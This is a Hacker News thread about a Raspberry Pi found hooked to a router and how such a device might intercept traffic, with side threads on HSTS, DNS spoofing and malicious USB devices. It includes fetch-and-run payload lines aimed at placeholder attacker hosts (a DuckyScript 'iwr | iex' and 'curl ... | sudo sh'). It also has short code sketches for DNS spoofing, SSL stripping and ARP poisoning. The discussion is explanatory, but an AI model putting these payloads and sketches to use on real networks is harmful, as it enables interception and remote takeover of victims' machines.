Hacker News
Found hooked up to my router (reddit.com)
965 points by empath75 on Sept 27, 2018 | 347 comments

> I have a Raspberry Pi right now in my hands from rentyouraccont.com, I have it running diagnostics on an air-gapped PC. This thing is wild. Every second it tries to connect to botnet programs. It not only buys ads on Facebook (which, btw, I cannot find code showing it actually does this) but it is creating links to malware-ridden embeds. It is part of a botnet, I can say for sure. Every second it tries to establish a connection to the botnet, it's like a bee that's lost its colony. Register for one and put it on an air gap, you will see exactly what I'm talking about. It records EVERY KEYSTROKE sent over the network, even SSL connections.

so this was a linked comment from a thread 3 years ago....

How is that even possible? How does it capture keystrokes (unless you mean Google searches where each key is sent for autocomplete). How does it break SSL?

It's probably not this attack but any WiFi device can probably be used to key log you.


This is legitimately astonishing.

It's not great.

Some areas of IT are in guarded rooms, with walls of a certain thickness, filtered power, external RF signals killed, and airgapped except for specific patterns for transferring between external systems.

You probably just want to buy a yubikey and accept that a lot of computing is built on a house of cards with respect to trust.


I think that by "every keystroke" he meant "every network packet".

Which would capture passwords in plaintext sent from the user side, no?

Yes, but browsers give huge warnings about password fields on non-SSL sites. Password in the clear won't happen with any major website.

If the site is non-SSL, then there's nothing stopping somebody in control of the network from replacing all "password" fields with plain "text" fields, and then applying a custom font to them so every character entered is displayed as a "•"

That's basically what a password field already is. That would make no difference to anything - the password would be sent over the network in exactly the same way either way.

Right, but some browsers display a small warning message when you select a password field on a non-https page [1]

If instead of a password field it's a text field with a custom font, no such warning will be presented.

[1] https://blog.mozilla.org/security/2017/01/20/communicating-t... http://http-password.badssl.com/

No. The point of switching out a password field for a text field is to prevent the browser from warning about the existence of a password field on a non-HTTPS-secured page. This is a well-known, old trick.
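The field-swap trick described above can be sketched as a one-line rewrite a MITM could apply to any HTTP response passing through it; the function and font names here are purely illustrative:

```python
import re

def strip_password_fields(html: str) -> str:
    """Hypothetical MITM rewrite: swap password inputs for plain text
    inputs styled with a dot-glyph font, so the page still *looks* like
    a password form while the browser no longer sees a password field
    on an insecure page (and so emits no warning)."""
    return re.sub(
        r'type\s*=\s*["\']password["\']',
        'type="text" style="font-family: DotFont"',
        html,
    )

page = '<form><input type="password" name="pw"></form>'
print(strip_password_fields(page))
```

The submitted value travels over the wire identically either way; only the browser's heuristic for showing a warning is defeated.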

There's a little "not secure" at the top in Chrome, something most users will simply ignore.

Not so little when the user is also typing into a password field

I can imagine an HN commenter scrutinizing things when encountering that warning, but it's not very actionable for anyone else.

"Ah, okay, it's not so secure, whatever that means... but I still want to login and do what I set out to do."

Do they? I don't think so...

Try http://login.ebiquity.com

Do you see any warnings in your browser? I see no warnings in Chrome.

This is shown in firefox: https://files.catbox.moe/srdxhe.png

Interesting. With the latest version of Chrome on Linux I see no warnings whatsoever...

Sooooo easily ignorable.

Safari shows a red "Website not secure" in the address bar like this https://i.imgur.com/6DXzZ8G.png

Chrome changes the "Not secure" in the address bar from grey to red (and displays a red exclamation mark symbol there) when data is entered into the form.

Which version/OS? I have the latest Chrome (69.0.3497.100) on macOS 10.13.3, and I see no red exclamation mark. Nothing changes or warns me at all when I start entering data in the fields.


Maybe you have a browser extension, or setting turned on that I'm missing?

It's not enabled by default on the latest Chrome, at least for macOS (10.14). You can enable it using the #enable-mark-http-as flag, after which HTTP pages with password fields will look like this:


This is in Version 69.0.3497.100 (Official Build) (64-bit), Windows 10.

This happens regardless of extension (i.e. in an incognito window).

> so this was a linked comment from a thread 3 years ago....

While major websites were already on SSL, a lot of websites weren't, and there were no browser warnings yet.

The box controls the DNS; majorwebsite.com points to any server the attacker likes.

The only defense is HSTS/certificate-pinning, for sites previously visited with that browser & device (it’s a TOFU security model).

HN has HSTS, but not Reddit, or my credit union, or my local pizza place, or Kaiser Permanente, etc. etc. etc.

EDIT: I believe e.g. Chrome and Firefox bake in some major certificates, which would also likely flag MITM attacks, for those sites.

EDIT II: Someone responded below (since deleted) that you’d also need that cert to be signed by a CA your browser trusts, which is true. My explanation is faulty/poor. Better informed discussion of attacks further down the thread!

That's assuming the box can generate certificates trusted by the target machines - there's a reason the CN field exists.

The X.500 series Common Name is a weird thing to fixate on here. It's an arbitrary free text "name". The only reason it's even sometimes useful in the modern era is that the CAB BRs say it has to match one of the SANs so it will probably be a DNS name. But even there good luck, it took until 2016 or so to get the last stragglers to obey that rule properly without "misunderstanding" it and unlike SANs it isn't defined to be DNS A-labels so it may have arbitrary Unicode text.

Most browsers stopped even looking at the CN, or only do so for people's crappy home-grown private CAs.

Anyway, what makes certs trustworthy isn't the CN, it's a chain of two or more digital signatures leading to a trusted root. And the CN in that root, while it had to be truthful when written, may be twenty years old, so it's nonsense now.

Good luck finding anyone willing to issue you a cert that's valid for 20 years.

Leaf certificates have a maximum permitted lifespan of 825 days (down from 36 months)

But I wasn't talking about leaf certificates, I expressly mentioned this for the CN in _root_ certificates and it's pretty common for those to have a lifetime of ten, fifteen even twenty five years.

Here's an easy to remember example, https://crt.sh/?id=1 the first entry in the crt.sh database.

The Common Name on that certificate is "AddTrust External CA Root". So... who are AddTrust? I actually have no idea. This root is today controlled by Comodo, a CA in the United Kingdom but you'd never guess that from the certificate.

> That's assuming the box can generate certificates trusted by the target machines - there's a reason the CN field exists.

If you're dumb enough to install one of these boxes on your network, you might also be dumb enough to install an attacker-provided root certificate on your PC.

But if you ask your user to install a CA, why not simply ask him to install malware?

Is it to circumvent antivirus?

The sort of people who could be convinced to install one of these things on their network in exchange for a theoretical $15 per month wouldn't be deterred by a broken SSL warning.

Eh... no. It's going to pick up worthless SSL-encrypted TCP packets but not keystrokes.

People need to calm the hell down here. If you’re connecting HTTPS to most of the web, the only thing this thing is going to do is collect worthless packet traffic. Woot woot.

It’s not meant to collect data, it’s meant to act as an agent to a larger network of these things to collectively impact something or another in whatever way. But they could give 2 poops about the traffic on your local network.

I agree, people are really looking into the keylogger theory, but actually I think the goal of the scammer is to have a "legitimate" (residential) internet connection with which to register hundreds of online accounts, or purchase ads, etc. If the IP gets blacklisted by a service (like Facebook), no problem, the account holder will probably notice that they can't get to Facebook anymore, call up the ISP and get a brand new IP address. All this for just $15/month.

One comment in that thread[1] gives a full explanation of what such a Raspberry Pi device hooked up to the router can do: forward all the network traffic, replace router's stock firmware with its own, install software on the network connected devices via known vulnerabilities, spoof websites by acting as custom DNS server. In my opinion, it looks like "a Pi-hole[2], but for phishing".

[1] https://www.reddit.com/r/whatisthisthing/comments/9ixdh9/fou...

[2] https://pi-hole.net/
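The rogue-DNS part of that list is almost trivially small to implement. A toy sketch of the spoofed response (assuming a single uncompressed A-record question and no EDNS; the real thing would sit in a loop answering faster than the upstream resolver):

```python
import socket
import struct

def spoofed_dns_response(query: bytes, fake_ip: str) -> bytes:
    """Toy DNS spoofing sketch: echo the victim's question back with a
    single A-record answer pointing at `fake_ip`. Assumes one question,
    no EDNS, no name compression in the query."""
    txid = query[:2]                            # copy the transaction ID
    flags = struct.pack(">H", 0x8180)           # standard response, RA set
    counts = struct.pack(">HHHH", 1, 1, 0, 0)   # 1 question, 1 answer
    question = query[12:]                       # question section verbatim
    # answer RR: name pointer to offset 12, type A, class IN, TTL, rdlength
    answer = struct.pack(">HHHLH", 0xC00C, 1, 1, 60, 4)
    answer += socket.inet_aton(fake_ip)
    return txid + flags + counts + question + answer
```

A box on the LAN path only has to answer with the matching transaction ID before the real resolver does; the client accepts whichever reply arrives first.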

I still don't understand how this device could steal login details. Everything should be encrypted and authenticated through PKI when using any website that accepts login details. Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.

>Everything should be encrypted and authenticated through PKI when using any website that accepts login details.

Yes, everything SHOULD be like this. I should be able to trust my neighbors and leave my doors unlocked as well, and I should be able to have faith in my elected officials. And yet...

The other issue is that you can connect to a website that implements HTTPS correctly, and still be borked if that site doesn't implement HSTS properly - there are tools that implement HTTPS downgrading on Kali.

>I still don't understand how this device could steal login details...Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.

The problem comes when your corrupted router messes with DNS and sends you to https://evil.chase.com, which has a pixel perfect mock up of a chase bank login screen, and a perfectly valid cert.

I'm disappointed that's not a real website

It is a real website, he just got the URL wrong. It's supposed to be https://www.chase.com/

I live for these kind of zingers!

Of course it's not real. It's a subdomain of chase.com. Parent should've said something like chase.evil.com.

If the user hasn't visited the subdomain evil.chase.com yet, an HTTP downgrade attack (https://news.ycombinator.com/item?id=18090419) would maybe work.

That's not a downgrade, but a lack of upgrade. A few comments back said https://evil but it would have to instead be http://evil assuming no rogue root cert is installed.

And requires that if the user had visited chase.com, that chase.com not have includeSubdomains in their HSTS header.

So to prevent a downgrade attack before a first connection is made, not only does the domain need to "includeSubdomains" - and have a valid lifetime (maybe of at least 31536000 seconds, or 1 year [this may just be a government standard]), but they'd also have to send the preload directive in their HSTS header and have been preloaded by that browser platform. If the domain is not preloaded, that first connection is required to get the HSTS information to the client in the Strict-Transport-Security header.
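The checklist above can be expressed as a small header parser. A sketch (the helper names are made up, and the real preload submission rules at hstspreload.org carry a few more conditions, e.g. serving a valid certificate):

```python
def parse_hsts(value: str) -> dict:
    """Split a Strict-Transport-Security header value into directives."""
    directives = {}
    for part in value.split(";"):
        part = part.strip().lower()
        if part:
            key, _, val = part.partition("=")
            directives[key] = val or True
    return directives

def preload_eligible(value: str) -> bool:
    """Rough preload check: one-year max-age, includeSubDomains, preload."""
    d = parse_hsts(value)
    return (int(d.get("max-age", 0)) >= 31536000
            and "includesubdomains" in d
            and "preload" in d)

print(preload_eligible("max-age=63072000; includeSubDomains; preload"))  # True
```

Without preloading, the header only helps on the second and later visits, which is exactly the TOFU gap discussed above.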

Perfectly valid cert how? Assuming no theft of a chase private key.

Perfectly valid cert for the evil.com domain - someone below pointed out that I flipped the domain names.

In reality the "evil" page would look something like "https://www.login.chase/login?id=DEADBEEF/.evil.com". For a non-trivial number of users, that's enough - "I see the nice green lock, I see chase, and some crazy web address characters that are always there".

Huh? "https://www.login.chase/login?id=DEADBEEF/.evil.com" wouldn't go to evil.com, it would go to login.chase. "chase" is the TLD of that URI.

Unless you're doing something super clever with characters that I'm not understanding, that's not how URLs work. ".evil.com" is clearly part of the query parameter.

Assuming they're not doing anything weird with Unicode, the evil pi is probably running its own DNS server, intercepting the traffic intended for normal DNS, and basically creating its own TLD the same way you would normally do localdomain. The evil.com part is redundant.

Sure, that's a totally different scenario than tricky-looking urls.

This seems...a little unnecessarily pedantic. It's an example of a well-known URL obfuscation technique -- we all understood what he meant.
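For what it's worth, a URL parser agrees with the pedantry. Python's urllib shows where that lookalike URL from the comments above actually points:

```python
from urllib.parse import urlparse

# Everything after the "?" is query string, so ".evil.com" never
# influences the host lookup at all.
u = urlparse("https://www.login.chase/login?id=DEADBEEF/.evil.com")
print(u.hostname)  # www.login.chase
print(u.query)     # id=DEADBEEF/.evil.com
```

The obfuscation works on humans skimming the address bar, not on the resolver.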

For example, you go to http://website.com; normally the website has an HTTPS redirect on the home page. Your router replaces that page and disables the redirect. Now it's up to you to notice you're on an HTTP connection.

If you think this is rare, I can tell you some Fortune 500 FX and stock trading sites had this vulnerability a year ago (haven't checked again).
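That redirect-stripping attack (in the spirit of the well-known sslstrip tool) is simple to sketch; the function name here is illustrative, not any real tool's API:

```python
def strip_https(headers: dict, body: str):
    """Toy sslstrip-style rewrite a MITM could apply to an HTTP response:
    downgrade any https Location redirect and rewrite https:// links in
    the body, so the victim never leaves plain HTTP."""
    headers = dict(headers)  # work on a copy
    location = headers.get("Location", "")
    if location.startswith("https://"):
        headers["Location"] = "http://" + location[len("https://"):]
    return headers, body.replace("https://", "http://")

h, b = strip_https({"Location": "https://website.com/"},
                   '<a href="https://website.com/login">log in</a>')
print(h["Location"])  # http://website.com/
```

The MITM then speaks HTTPS to the real site upstream while keeping the victim on HTTP downstream; only HSTS (or an alert user) breaks the chain.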

This is why certificate pinning and modern web security practices are so important. On a well configured site, this attack would fail.

If you had never visited the site, how would modern security practices have prevented the attack?

HSTS is useless in this case isn't it?

Correct. HSTS does not protect against a first visit to a site. And to work around HSTS, there are many ways to get users to clear their caches, install new browsers, or use new devices to browse sites they've already visited.

Technically, if the domain had DNSSEC enabled, it might prevent this kind of attack, but no regular consumer is using a validating stub resolver, so even DNSSEC wouldn't work.

Now that browsers are saying "Not Secure" by default for HTTP pages, users are apparently expected to notice this popping up where it didn't before and realizing they're on a phishing site.

Many sites can have HSTS baked into Chrome itself (the preload list), so it wouldn't be entirely useless.


Anyone can preload their domain in Chrome, Firefox and others that share the preload list. I'm not sure what vulnerabilities are left after your site has been preloaded.

The only vulnerability left would be, as mentioned above, a client installing a browser that doesn't support HSTS.

If your attack relies on getting the user to install your own browser, don't waste your time with a simple HSTS bypass.

No. If the domain (and its subdomains) are preloaded - then a first visit is not required. The HSTS requirement is then baked into a list supported by modern browsers such as Firefox and Chrome.

Preloading always includes subdomains (it's not possible to preload without them).

HSTS and Certificate Transparency, yes. Certificate Pinning is too easy to shoot yourself in the foot with, so it should only be considered for the most sensitive sites.

Dynamic pinning (HPKP header) is being rolled back from browsers because of the reasons you mention. Only a small set of static pins will remain (in Chrome, Google sites for example).

I think the idea is that it could proxy communication. Mitm

you still have to install the proxy certs

Pick your favorite windows 0-day and use it to only install a cert and nothing else that would tip off AV software.

Are Windows 0-days really that common? I thought they were usually saved for really serious attacks, e.g. from state-sponsored actors, not scams on the level of "pay some random person $15 a month to attach a mysterious device to their router".

I can't answer your question authoritatively, but there are plenty of organised criminal enterprises in the world with state-level resources.

Not just a question of state-level-ness, but of targeted/mass. Burning a 0day on a mass scam is really, really stupid.

Not only that, but because the device has unfettered access to the internet, an attacker can always update it with new ways of installing certificates on your machine.

You don't even need 0-days, as most users hate updates and try to disable them, every single time.

Assume one of many attack vectors:

any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.

If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.

DNS can be mutated.

Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.


Hundreds (if not thousands) of repeatable attack vectors given physical access to the network like this.

HTTPS protects against all of these:

> any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.

Which is why everyone is moving to HTTPS.

> If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.

If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.

> DNS can be mutated.

Which won't allow you to MITM HTTPS sites.

> Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.

Any auto update software which doesn't verify certificates has a major security vulnerability.

>HTTPS protects against all of these:

>Which is why everyone is moving to HTTPS.

Yes, but a MITM can block or hamper conversion to HTTPS and mutate the content. HPKP and HSTS are not widely used yet (and even if they are, the first request can be bypassed given this topology). Given current "end user" level protections, having a device such as this on your network basically ensures you can be hijacked if even one request is made over HTTP or to a site not currently pinned to HTTPS.

>If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.

FFS, the point is the MITM gives a huge amount of attack surface to breach the client -- which yes, after that is done, all bets are off. Everything from injecting code into zips/executables/etc. downloaded over HTTP to using 0-day browser exploits and mutating requests. The device itself is physical access to your network, which makes access to the clients 1000x (if not more) easier.

> DNS can be mutated.

There are other protocols besides HTTPS.

>Any auto update software which doesn't verify certificates has a major security vulnerability.

Granted, yes. That does not make it rare or unusual; look at the CVEs. There are many developers who write (or enable) auto-updaters who should not be responsible for that, given their understanding of security.

It's amazing how many people forget that Raspbian is still Linux under all the Wolfram and Raspberry Pi stuff. So you essentially have a tiny computer that can be plugged into almost anything you can program for.

Do people really forget that? I thought that was the whole point of raspberry pis.

It depends on what you're using it for. I bought a kit for setting up a RetroPie because I didn't feel like checking to ensure the parts were all compatible. It gives you step-by-step instructions to set it up, and none of it requires knowing anything about Linux. You just download an image file, write it to the SD card, and when you plug it in it does all the setup itself and you're just presented with the RetroPie GUI. The only hint that it's Linux under the hood is when the names of processes scroll past on the screen as it's booting.

Nobody using a raspberry pi forgets that.

If they picked it out and bought it, yes, obviously.

However, there are a lot of products sold that perform selected tasks that run on preconfigured raspis with the consumer none the wiser. Kodi boxes, emulation kits, scientific plug-and-go kits, and much more.

I have been offered or asked about things running on raspi hardware on many occasions by people who were none the wiser to what platform they were using, and we recently had an event where we gave out around a hundred of them preloaded with run-once synchronized software for an event. How many of those people knew for certain they were holding Raspberry Pi Zero W boards with pared down Linux kernels? None.

They're a lot more commercial and common than a handful of snarks with downvotes realize, and OP doesn't deserve to be punished for that.

Keep in mind that all modern routers are also tiny computers, typically running Linux with a minimal userland like BusyBox. They can run arbitrary programs and they're connected to everything you have by default.

Really, people forget that Raspbian might just possibly be related to Debian?


Is a disk image of one of these available anywhere?

I find it much more likely that these are being used for what they say they are (basically a proxy so they can buy ads from a residential IP) than some crazy MITM device. The "Attacker" is basically renting an IP connection or paying a co-location fee for their little server.

Plugging a device into your network doesn't make it magically see all the traffic. It would have to be doing ARP spoofing, DHCP hijacking, or hacking the router config/firmware. Is it possible that it is doing some or all of those things -- sure. But why? That could all be done via a malicious client executable that would give you access to the network and much more, and is much more discreet than a physical box, so why would someone go through the trouble of shipping out a box + paying the recipient? The simpler explanation is that the sender of the device is doing nefarious actions on the internet and needs a bunch of IPs for cheap, so when they get blocked they can just move on to the next IP.

Would I put one of these on my home network - hell no. But if one of my friends tells me they had one plugged into their network I wouldn't immediately assume that their entire digital life was compromised. I would tell them to unplug it though.

Well, if they are willing to break TOS to sell ads on Facebook, how much further do you need to go to rationalize auth capture, rootkit injection, or any other malicious activity?

"Plugging in the device on your network doesn't make it magically see all of the traffic" ... Assuming it has not been constructed to do all of the things you list (or more) does not magically make it not see all of your traffic either. There is no magic involved, it is either constructed to capture/inject or not -- the only way to know is to review the actual bits and firmware.

Unless you work in a SCIF (and probably not even then) your local network should not be considered trustworthy. Assume that hostile activity is always present. Especially if you have "appliance" type stuff on your LAN, such as ISP-provided routers, Amazon/Google devices, smart light bulbs, etc. Keep your machines and firewalls updated.

> Well if they are willing to break TOS to sell ads on facebook

What TOS? Facebooks? Why would they be bound by it?

Well personally I do see a small distinction between breaking a corporate TOS and felony unauthorized network access.

Unless OP is someone very special, all their private data isn't worth 15 dollars a month.

I suspect this device is far more likely a broadband speed testing agency trying to get speed test results from different consumer ISP's, taking WiFi and the customers device out of the picture.

I disagree; the plug-in-this-Raspberry-Pi scam is unfortunately not uncommon, and not at all related to broadband testing AFAIK. A company called rentyouraccount.com runs a similar scam, and their service explains what the Pi is doing:

>Facebook has several mechanisms in place to protect your account. We make every attempt to work within these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.


Sounds true, although I question why they don't simply install a proxy extension in the user's browser. Would save them a lot of capital expenses.

Yes. You’re right. These things don’t care about local traffic. SSL would ruin its day if that were the case.

This is meant to be an agent to a network of these things. Not sure what the total point really is, but I can pretty much guarantee it has absolutely no cares about the local traffic.

> Plugging a device into your network doesn't make it magically see all the traffic.

Isn't that exactly what Wireshark's "promiscuous mode" does?

For wired Ethernet it depends on whether the traffic even reaches that port or not. Old dumb Ethernet hubs used to pass all traffic to all ports, but modern switches only send traffic to the intended destination.

It will show you everything coming out of the switch port but only traffic to/from the connected device will come out the switch port.

You have to use ARP poisoning or some other trick to get other network devices to send ethernet frames to your mac address in order for the switch to forward them out your port.
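That ARP-poisoning trick boils down to sending forged ARP replies. A minimal frame-building sketch (the raw socket and the resend loop a real tool would need are omitted):

```python
import struct

def forged_arp_reply(victim_mac: bytes, victim_ip: bytes,
                     spoofed_ip: bytes, attacker_mac: bytes) -> bytes:
    """Build a raw Ethernet frame carrying an ARP reply that claims
    `spoofed_ip` (e.g. the gateway) lives at `attacker_mac`, so the
    victim starts sending its traffic out the attacker's switch port.
    MACs are 6 raw bytes, IPs are 4 raw bytes."""
    ethernet = victim_mac + attacker_mac + b"\x08\x06"   # dst, src, EtherType=ARP
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2)      # Ethernet/IPv4, op=reply
    arp += attacker_mac + spoofed_ip                     # sender: attacker "is" gateway
    arp += victim_mac + victim_ip                        # target: the victim
    return ethernet + arp

frame = forged_arp_reply(b"\x11" * 6, b"\x0a\x00\x00\x02",
                         b"\x0a\x00\x00\x01", b"\x66" * 6)
print(len(frame))  # 42: 14-byte Ethernet header + 28-byte ARP payload
```

Most hosts cache whatever ARP reply arrives last, which is why this works on a switched network without any promiscuous-mode tricks.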

If someone shipped this to our office with a note like "attach this to a LAN port," chances are it would get attached. And we're a software house. People tend to pay attention to viruses, etc., but not physical security.

At a previous employer (Fortune 500, not a software co.) the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network. IIRC there was a depressingly high (> 50%) rate of them being plugged in.

> the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network.

Which is clever, but given the current level of small scale integration you could just as easily hide the same exploits inside of a charging cable, a USB fan, or really any other small-form factor USB-pluggable gadget. The problem isn't them discriminating between "hacked" and "non-hacked" devices -- it's them plugging _anything_ non work related or issued into their USB ports.

Anecdotally, I heard of a toy radio control quadcopter belonging to western military personnel in Afghanistan that turned out to be trying to phone home to ${badguy} when they plugged it into a laptop to charge. This stuff is everywhere, and has been for years.

This is why I keep a large supply of "USB Condoms" (little dongles that short circuit the data, and allow charging/power only)

Product idea: internal condoms for every USB port on a business computer. Let employees charge their phones in USB ports or plug whatever in, data wires never connect - problem solved: Employees can charge their ${device} without risking security compromise of the host workstation.

How is that better than epoxy squirted into all unused ports of your existing computers while also distributing fast charging USB wall warts across the office like confetti? Even the good ones are relatively cheap, especially if bought in bulk. Relative to the cost of a desktop computer they're practically free.

(I'm genuinely surprised that the standard DELL and HP corporate workstation doesn't have its front USB ports deleted and its rear port access covered by a lockable metal cowl.)

How do you know the wall wart is not a fake one?

I noticed this with my mobile WiFi (Huawei), which I generally leave plugged in: when my friend plugged her Windows 10 tablet into the same power outlet (2 sockets), it suddenly showed up as a new USB device. I don't ever plug anything in there except a charger for my bike light, so I'd never noticed, but I don't know if it has an autorun to install drivers as they often do. Obviously the data wires are joined there.

How do you know your security guard is not a fake one?

At least on Dell, USB ports can be disabled in the BIOS (with separate options for front and rear ports). Disclaimer: I haven't tried to do it so I don't know if it actually works.

Caveat: you'll need to hire a lot more IT people because everyone in the company will be lined up out the door with complaints. "This computer doesn't work with my keyboard, I need a new one." "My mouse isn't working." "This computer won't read my flash drive and I have to get this file to accounting by 10:00!" "This computer isn't working with my pen tablet and the deadline for getting these graphics done is tomorrow!"

So you'll have to replace all of your intentionally-broken computers with good ones, which will cost a fortune on top of all the employees' lost work time and no one will want to buy the broken computers from you so you'll have to pay to have them scrapped.

Disabling USB ports, for example in the BIOS, is very common in larger corporations. Dell sell a secure cover to prevent access to the rear ports.

The person with the accounting data on a USB stick will get a formal reprimand for breaking the security policy.

You still need to hook up stuff to a computer - mice, keyboards, those weird 3D-mice our CAD people use, printers, and these days even displays are all attached to USB ports. And since the ports USB replaces have mostly gone, there is little alternative left.

At work, we keep a couple of power-socket-to-USB chargers around, if people want to charge their smartphone they can grab one. But simply disabling the USB ports on our users machines is not a realistic option at this point.

Wouldn’t everything then only charge at 100 mA?

No, shorting the data pins signals "this is a charger, you can charge as fast as you want, until it's so much current that the voltage starts to drop too much".

Except when the device is designed to prefer chargers from $vendor. LG was notorious for this some years back.

Which is totally redundant, because that can be done at the operating-system level, but hey, bottled water is a huge industry too.

Epoxy can't break with a security update

you could warm it up and pick it out when soft though

Epoxy doesn't melt. It burns--at a temperature where your computer case starts melting.

Not if it's the right kind of epoxy...

USB drivers can still be vulnerable, though.

A previous employer would buy modified motherboards with the data traces removed/cut.

So these IT geniuses at a Fortune 500 company were clever enough to test their employees' computer security acumen (and get the predicted result) but they weren't clever enough to simply block all use of USB mass storage devices on their corporate operating system distribution?

Surely by now all corporate desktops should be configured to not respond to any USB devices other than the generic HID for mouse and keyboard, plus a whitelist of approved devices (e.g. fingerprint readers, Yubikeys). Inserting a USB mass storage device into a corporate workstation should result in nothing. Plug-and-play shouldn't be triggered. The mass storage driver should not load.

The computer security industry for SMBs is like 95% theater and 5% actual practice.

Conducting that test produced something tangible for whoever made the purchasing decision: It clearly illustrated a need for the services rendered, did it in a way that offered job security to management by giving them license to assert the position over their subordinates, and established a metric by which to evaluate the security company's performance which can be easily, repeatably, and predictably improved over time.

It also checked a lot of boxes that will be useful in court if they ever need to prove that they weren't negligent on privacy and security, which is a form of insurance that has real measurable value when it comes to legal claims.

> The computer security industry for SMBs is like 95% theater and 5% actual practice.

I'd say it's 40% paranoid arse-covering by IT department heads, 35% whatever middle management incorrectly assumes to be current best practices, 20% ego-stroking by the CIO, and 5% sensible context-driven decision-making by IT front-line staff.

Those numbers sound a little thin on the bottom, but only a little. Maybe take 15% out of the CIO category and just throw it away, because they're usually very quick to turn on their underlings.

Trouble is that the same corporation has the following additional policies:

* A ban on mail attachments of certain types (Excel, zip files...)

* Mailbox limits from the 1990s (100MB or so)

* A ban on Dropbox, Gdrive or any other file sharing service

* No public-facing sftp or similar

* A web site so mired in red tape that it takes 6 months and a dozen approvals to get anything uploaded.

Often the USB drive or something similar is the only way for employees to actually do their jobs.

It seems the problem is bad corporate file sharing policies that are incorrectly validated as successful because the employees are using workarounds rather than pointing out its inadequacies.

One of many depressingly common pathologies in large organizations. The best way to ensure your infrastructure won't break is to ensure it's not used; whether or not that means people can do their job is a concern for a different department.

Welcome to the real world! :)

I have seen this kind of situation, too. It sucks, but if you play by the corporate rulebook and lobby for better rules, you will be either worn out or retired by the time those rules get updated.

In these situations the organization really should get box.com subscription (or Dropbox enterprise) and have file sharing with control, auditing and org policies.

Don't believe generic HID is safe either. You could make a device that pretends to be a keyboard and automatically types Win+R, then "curl http://evil.com/script.sh | sudo sh", then Enter, then after a short sleep, Alt+Y.

Sorry for mixing Windows and Linux, but conceptually something like this should work on Windows if you don't require a password in your UAC prompts.
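The classic packaging for this attack is a "Rubber Ducky"-style keystroke-injection device; its payloads read like the following DuckyScript-flavoured pseudocode (URL, timings, and the payload itself are made up for illustration):

```
REM Enumerate as a keyboard, then type faster than the user can react
GUI r
DELAY 200
STRING powershell -w hidden "iwr http://evil.example/p.ps1 | iex"
ENTER
DELAY 500
ALT y
```

From the OS's point of view this is indistinguishable from a very fast typist, which is why "only allow generic HID" is not a sufficient policy on its own.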

I wonder if a big (Fortune 500) company could get HID devices customised so that only company-owned devices could be plugged in. It shouldn't be that hard to design a device that shows up as a custom device; the installed driver would then poke it in a cryptographically shielded way, and only then would it provide the keyboard/mouse inputs. It can't simply do the standard "detach and reattach as a HID", because otherwise any HID would work.

Hm, perhaps.. is anything like that available already?

Please no, don't add DRM in keyboards.

Just leaking data requires no UAC!

I don't think I've ever heard of a company that actually does this in practice. I suspect it ends up simply being more trouble than it's actually worth. I know at that company the list of approved device would probably end up being dozens of pages long... and yeah, thumb drives and USB hard drives were used a decent amount, especially outside of IT.

Maybe someone needs to invent a USB-based thumb drive reader that only allows generic mass storage devices to be attached but does not work as a hub, rather as a proxy device.

Bonus points: don't mount the drive directly, instead connect it to a centralised server on the corporate network that scans for threats and mounts a sanitised version of the drive's contents as a network share.

Triple word score: audit everything contained on every drive and everything that is copied on and off.

Sell that for $200 per unit to Fortune 500 companies and paranoid government agencies worldwide... and you'll retire early.

Your triple word score is already handled by a dozen different companies doing endpoint security from advanced heuristics at the kernel level like Crowdstrike, or just filenames and hashes like Code42.

Isn't that basically a NAS?

A consumer (i.e. workplace for people who don't know better) NAS is usually Linux with a few hard drives attached via a cheerful and brightly coloured web UI - occasionally useful, some way short of secure.

I expect someone sells hardened ultra-secure corporate NAS boxes, but I've never seen any in the wild.

The trouble is, the sort of people who would buy a pre-hardened NAS are also the sort of people who would be suspicious of a pre-built unit. I know for sure I wouldn't trust anything off the shelf, I'd take the base OS and build something around it.

Whoops, my tin-foil hat appears to have slipped.

Anecdote for anecdote, I have.

Work at a fortune 500 company, we're currently eliminating USB ports for data devices - but leaving them open for other devices that do not identify as media.

We are dragging people to a corporate cloud solution, however we are finding that the drive to cloud has severely underestimated the volume of data that people will sync across the network, and how much work is done outside official corporate systems and in Excel instead.

This is having two effects: our network capacity is being drained, and users are reporting performance issues due to latency associated with poorly developed Excel applications.

It's a pentesting technique, used to assess the level of effectiveness of user training.

While your final comment is accurate, it is impractical as usb mass storage is still required in many places. Also, you can't effectively block HID, and an attacker can use HID disguised as or in a thumb drive to successfully attack a network.

I’m not sure I understand what the big deal is, unless your machine tries to run software automatically from devices that are plugged into it. If you plug something into a CentOS machine, it’s not going to be able to do anything until you mount it, and even then, why would code be able to run from it?

Well for starters, if you’re curiously plugging it in, you’re going to mount it aren’t you?

Second, it can emulate an HID keyboard device and type keystrokes faster than you can react and pull it out, at which point it’s far too late - it’s pulled a secondary payload down or mounted a USB mass storage device and you’re owned.

You got me at the emulate a keyboard thing. Now I’m thinking that you shouldn’t plug strange keyboards or mice in because they could have an onboard payload. The crash cart at a data center is kind of a dumb idea in a way except the place is full of cameras usually

You're absolutely correct.

You know those little desk fans that come with a USB now and also an adapter to plug into the electrical outlet. I don't plug those into my laptops ever - who knows if there's a payload on them.

I will say this. I currently work, and have worked at, a few secret and top secret facilities - and the number of people I see plugging those (and similar) devices into their laptops is scary.

> the number of people I see plugging those (and similar) devices into their laptops is scary.

If such a device is able to cause a compromise / incident in a secure facility, well, several different "failures" at several different levels have occurred in order for it to get to that point.

